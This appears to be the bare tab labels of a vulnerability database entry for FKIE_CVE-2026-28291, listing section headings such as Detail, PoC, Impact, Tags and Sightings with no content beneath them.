Detail

PoC

Impact

FKIE_CVE-2026-28291

Tags

Sightings

Nomenclature